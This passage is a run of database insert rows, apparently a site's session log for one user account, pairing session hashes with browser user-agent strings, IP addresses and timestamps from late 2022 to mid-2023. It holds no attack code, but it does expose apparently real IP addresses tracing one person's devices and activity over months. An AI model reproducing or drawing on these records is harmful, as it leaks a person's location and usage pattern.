('39b2ff81b49ea56a1ac1f368d4f3671f', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '171.253.128.133', '2022-11-11 23:38:57', 1),
('344929cbca2172e4306297959d97c278', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '113.22.144.44', '2022-11-12 06:56:22', 1),
('9d2a4a717c32dfbd5e21f834800bbaeb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '113.22.144.44', '2022-11-12 23:18:31', 1),
('e79b47de514f7f4eeeaff71b249f97a1', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.66 Mobile/15E148 Safari/604.1', '113.22.144.44', '2022-11-13 07:57:28', 1),
('e3d78eaacbfd1c78379c9f91721945d2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '113.22.144.44', '2022-11-14 06:38:40', 1),
('9198beb6245c299eb20b2fa8a18e8287', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15', '113.22.144.44', '2022-11-14 07:30:28', 1),
('d75d9e368d12974ae65b97de444e2cb3', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0', '115.77.188.167', '2022-11-14 18:20:41', 1),
('73ca8ae46d71f5dd972e57db08a1c39a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '113.22.144.44', '2022-11-16 07:21:49', 1),
('56778bf7cc352da8c98d034ae2fcf155', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '113.22.144.44', '2022-11-16 18:24:38', 1),
('c2b1c2b224083732cc3350e8b2a576ca', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '113.22.144.44', '2022-11-16 18:30:18', 1),
('bb5d0e885d5834dd59c99ef3770d4556', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-16 20:09:45', 1),
('1e65e38c4d43527528ea8cea6daf5b76', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-16 20:20:01', 1),
('1fc2a9bc94c871da9b835cc85eed4110', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '171.253.140.96', '2022-11-17 02:28:30', 1),
('b395316610a6eb9f2ea4fb5fc0b8693e', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '113.22.144.44', '2022-11-17 09:36:44', 1),
('b9f44c5acf9c9e60a16669fac517b561', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-22 00:19:16', 1),
('ceb8a72fff8a1684482bb10bd521605e', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/19.0 Chrome/102.0.5005.125 Mobile Safari/537.', '115.77.188.167', '2022-11-23 22:11:35', 1),
('bb15a3602d9268363661390aee038a1f', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/19.0 Chrome/102.0.5005.125 Mobile Safari/537.', '103.199.70.95', '2022-11-25 05:18:35', 1),
('8c9178db557a003a53a69e21e0cfcd51', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '42.119.166.130', '2022-11-25 17:38:11', 1),
('23e9d1ada26d335c619314273d50ef5f', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-26 22:12:45', 1),
('a85589be23033576459bca6757ed5ac5', 1, 'Mozilla/5.0 (iPad; CPU OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/108.0.5359.52 Mobile/15E148 Safari/604.1', '14.161.9.172', '2022-11-29 18:35:51', 1),
('b46e7b1ecad1c57d87caa3da11c55880', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-29 19:17:20', 1),
('935bdf16bff2f4865973e84925ff3785', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-29 19:53:43', 1),
('43aa6f61bd8ab32829c5576a52ba7545', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '42.119.166.130', '2022-11-30 05:49:10', 1),
('3b0b81fc17c653bc4bfcf38e1cf57259', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-01 00:58:21', 1),
('8881561829e350e88d1f54c2c02fc79d', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-01 02:32:03', 1),
('48816c4ca1855ddbd820a5a393028f92', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15', '42.119.166.130', '2022-12-01 05:51:38', 1),
('5a6c53cb6bfef5dcef30ebf505640ac8', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '42.119.166.130', '2022-12-02 21:32:51', 1),
('a9b5e3bdce356ad398ccc1766f53f826', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-05 03:26:16', 1),
('1e675d35157b48f89fefe2b748564c45', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '42.119.166.130', '2022-12-05 08:27:47', 1),
('2e5363c9a999eea63ecb407d5ff1275d', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-07 19:23:14', 1),
('979271910709c97f8cdf6c82137a53b7', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-13 03:37:48', 1),
('6d9dca858fd0e9254deeb544898e0e60', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0', '115.77.188.167', '2022-12-16 00:32:09', 1),
('ead7c0adda58427ec69c126b925b73d6', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-20 23:39:42', 1),
('7adf772836239b26b2911071d2a4329c', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '115.77.188.167', '2022-12-21 00:00:37', 1),
('92dd415f73dfef6ee83ff3a890731078', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-21 03:00:45', 1),
('290a97860044b969a0dbadb02b19a848', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0', '42.119.174.50', '2022-12-21 14:44:15', 1),
('e2f9f9bbd276a12389bf9b0742e899c8', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '115.77.188.167', '2022-12-23 21:51:54', 1),
('e94e8f0076eeec218fa4b6877d3a7e0a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', '14.179.38.215', '2022-12-27 02:02:32', 1),
('05eaeb12786d3c79be0bdb37c97c5de7', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '14.161.9.172', '2023-01-08 18:24:10', 1),
('00d0fa5c8e01b16e3f89be5667554bfe', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '115.77.188.167', '2023-01-12 18:57:07', 1),
('eef8c167983f578decbabbb6acf36967', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', '113.163.232.131', '2023-01-16 21:19:30', 1),
('fca50b9878a8b5ec943714767f39180a', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '27.67.87.156', '2023-01-25 03:31:13', 1),
('fb62e2a8715b1a2ef272753780376b2f', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '42.116.94.11', '2023-01-31 07:42:00', 1),
('245df08715f094c40d601b279bf77d07', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '125.235.190.200', '2023-02-02 23:13:36', 1),
('48d7036bcf53f561e20ff733b5f52d9a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0', '222.254.195.183', '2023-02-03 20:47:51', 1),
('4b49a79502fb6369a8c25d137b795a73', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/19.0 Chrome/102.0.5005.125 Mobile Safari/537.', '103.199.69.251', '2023-02-06 18:32:08', 1),
('589088c56c4e161336772f01dabb19f0', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0', '42.117.124.246', '2023-02-09 15:44:56', 1),
('c9a78cb1838986b019bd117396bd7506', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', '115.77.188.167', '2023-02-14 21:34:13', 1),
('c443b2dd6a1376cde0631c6d16fb7f74', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '171.255.120.241', '2023-02-15 03:03:40', 1),
('61ad8108cbb2cae3d3fe9f14b222039c', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', '42.112.74.49', '2023-02-16 03:55:13', 1),
('c263b1418b51a94cde3d84d1e80cf4a3', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0', '115.77.188.167', '2023-02-16 22:59:06', 1),
('551fe5aa1b251449bb2f0c6fcc8ce9c0', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '171.253.134.243', '2023-02-17 22:43:21', 1),
('2d2b96a3f282491a60303e47cfcb118e', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '115.77.188.167', '2023-02-23 00:11:30', 1),
('da77401493ac439c47098ffd745959f3', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0', '42.112.74.49', '2023-02-23 07:00:19', 1),
('5c9ce95a749dba040ffa70546f044c5d', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '172.225.56.73', '2023-02-23 17:51:12', 1),
('0c314f091c04ad4aa09dfd9f144c1da8', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0', '115.77.188.167', '2023-02-24 20:14:42', 1),
('c0d8a17d62a38f92e17a5ffe99a47877', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0', '42.112.74.49', '2023-02-26 03:33:19', 1),
('74e27a3907ff7a601c2c3a81d3b6f8b2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '42.112.74.49', '2023-02-27 05:45:39', 1),
('5476b2cf3b2180ce5e3e70fe6b69fd22', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '42.112.74.49', '2023-02-27 06:57:44', 1),
('7e3bb0b8933939dae7b8b3472b643ae9', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0', '115.77.188.167', '2023-02-28 02:53:11', 1),
('ac8da3b008eb24a1382416fcaa344427', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15', '171.252.189.8', '2023-02-28 20:55:19', 1),
('68c72dacbb12067b60efda0bdebbd0e3', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/110 Version/11.1.1 Safari/605.1.15', '42.112.74.49', '2023-03-01 05:28:12', 1),
('aaa59a44b1e8794de39cd4aed3885b5d', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15', '42.112.74.49', '2023-03-02 06:29:15', 1),
('7a1e99e959f2d426166dbd4e4db251d7', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1', '104.28.119.129', '2023-03-02 10:00:54', 1),
('915b237c631c9abd9d0174a64d073c30', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/110.0.5481.114 Mobile/15E148 Safari/604.1', '42.112.74.49', '2023-03-02 10:50:28', 1),
('a25ed1059e3d0e5ecbc2153123cb4cd0', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0', '115.77.188.167', '2023-03-03 04:54:45', 1),
('8ab7c80d1fdce70390a4bcc02aeff377', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '115.79.27.105', '2023-03-06 18:58:01', 1),
('733454893790ea8fe08e779f04c6d506', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '115.77.188.167', '2023-03-07 02:09:31', 1),
('0dabc4490b55271fe3e8ad917d206ddb', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63', '115.77.188.167', '2023-03-09 06:39:28', 1),
('f90757a48e99eb6b7c23a99f4ddda624', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '115.77.188.167', '2023-03-09 06:57:16', 1),
('25bcda1f778d13104a408c99df7c1cc5', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/20.0 Chrome/106.0.5249.126 Mobile Safari/537.', '183.80.157.79', '2023-03-12 08:35:48', 1),
('c31a278b53d290113a23d5da630e67ab', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '183.80.157.79', '2023-03-13 19:58:04', 1),
('a0a1a1d3b65ae6e55c632f1046ca1947', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '42.117.255.86', '2023-03-14 06:56:59', 1),
('b461221cb1991c27196af9bebb119bcd', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '222.254.195.183', '2023-03-15 00:42:14', 1),
('76c6bc8071bfc4cfc6512c7e34ea6966', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '42.117.255.86', '2023-03-18 08:05:10', 1),
('c43cdd6c99719b4f532406dc66047f84', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '42.117.255.86', '2023-03-18 20:46:45', 1),
('73a5b25ddc80602aef0f4ac9495adc61', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '42.117.255.86', '2023-03-18 20:46:56', 1),
('1534000b34746f995ad592e6eb0771c2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '42.117.255.86', '2023-03-18 22:00:40', 1),
('09e424ab661bf54a3f9da1fb9ab4690d', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/20.0 Chrome/106.0.5249.126 Mobile Safari/537.', '42.117.255.86', '2023-03-18 22:03:39', 1),
('d7bdadd8f104d0ac81b45d104b22cc85', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/110 Version/11.1.1 Safari/605.1.15', '42.117.255.86', '2023-03-18 22:06:12', 1),
('d14c0dd1670030023ada35f070b29e81', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '42.117.255.86', '2023-03-18 22:47:28', 1),
('5033babeeff8853f31dd48f7704869be', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15', '42.117.255.86', '2023-03-19 02:26:00', 1),
('72fadc202110757b68e7a4d833185edc', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '115.77.188.167', '2023-03-19 19:30:28', 1),
('a8c9f0665e87bfbdabf87818a9f46206', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '115.77.188.167', '2023-03-20 18:40:52', 1),
('34d912bda8413eed5f35d3e0b568ba13', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/20.0 Chrome/106.0.5249.126 Mobile Safari/537.', '103.199.68.116', '2023-03-22 04:16:06', 1),
('19fbd63cb521dfd5aa2826192cd51e9d', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '115.77.188.167', '2023-03-22 23:52:37', 1),
('8c7560de34ba4e0def79545d4a96ffea', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '42.117.255.86', '2023-03-23 17:28:34', 1),
('6db0fb947579e1ea88d7be5cf83dc805', 1, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/20.0 Chrome/106.0.5249.126 Mobile Safari/537.', '103.199.40.53', '2023-03-24 06:00:02', 1),
('1ab5cd0b05e456b645c5cdbe8d93a423', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '222.254.195.183', '2023-03-24 21:22:40', 1),
('8a6b7c5ddb380785cb372c83c5619e84', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '42.115.107.238', '2023-03-29 07:49:45', 1),
('1495c5efb744a38ae81f11760a45783b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0', '115.77.188.167', '2023-03-30 19:51:33', 1),
('9eb3112729f648711e6818700ed54f60', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', '115.77.188.167', '2023-03-30 20:14:19', 1),
('78dc0a7cde13aa1d0ff77a1c0adc331c', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/110 Version/11.1.1 Safari/605.1.15', '42.115.107.238', '2023-03-31 17:00:46', 1),
('e814141491e0880b1683abf267c87e95', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', '115.77.188.167', '2023-04-13 21:01:43', 1),
('760c63cbf5f631cd260c73e576764d0e', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48', '118.71.184.77', '2023-04-16 04:49:13', 1),
('38f6d984e6e313dae02c347784b037c4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', '115.77.188.167', '2023-04-21 20:09:38', 1),
('4e658be89efa915f0e3bc7134e6dfbce', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48', '115.77.188.167', '2023-04-25 20:55:31', 1),
('b73c44860458a83b84d236cef75797fb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', '14.191.211.94', '2023-05-05 00:00:42', 1),
('62a5ccc7f97d2e7d4e8936eca4a52ddf', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36', '222.254.195.183', '2023-05-07 21:22:36', 1),
('732b0b84a3ee8bfc0edb4ade2a67c639', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36', '42.119.214.88', '2023-05-08 04:18:40', 1),
('c760a9d3241b55af684a9baf48d1e892', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48', '222.254.192.176', '2023-05-12 19:36:29', 1),
('8bcbc0cf5f1bafd781660f0e740dc8fc', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36', '222.254.192.176', '2023-05-14 23:31:06', 1),
('3f2d0fe0d25cf64b4d82d3faf0fa0cfb', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/114.0.5735.99 Mobile/15E148 Safari/604.1', '183.80.187.168', '2023-06-13 01:49:29', 1),
('9a60e6470cf6c8cf18c1691e20e6ec0f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0', '27.70.242.131', '2023-06-21 01:59:52', 1),
('343c8854c33d9d5beeeb24e349a258c2', 1, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/21.0 Chrome/110.0.5481.154 Safari/537.36', '1.55.156.186', '2023-07-02 16:37:23', 1),
('aea9a522782dc7c9565255520d65afdc', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '42.119.240.77', '2023-07-07 00:12:40', 1),
('bcd72c10efe5a1c00ffa85e1d7d5d7ec', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '14.191.211.184', '2023-07-08 20:37:32', 1),
('64013eee90c77c2f8dc76b4e60fc0cca', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '42.119.240.77', '2023-07-12 19:45:53', 1),
('431d664c8f2e67eecdf90f3bbed3e836', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48', '42.119.240.77', '2023-07-13 02:40:00', 1),
('7f9c68d3c30c3cab0a4ef036ce50bce5', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.84 Mobile/15E148 Safari/604.1', '42.113.185.160', '2023-07-21 23:27:59', 1),
('616653fe322a07cf55b565b5e9e4f114', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '42.113.185.160', '2023-07-24 01:26:39', 1),
('2556f70823a5f39e64d25f2c329e6394', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '42.113.185.160', '2023-07-25 14:37:31', 1),
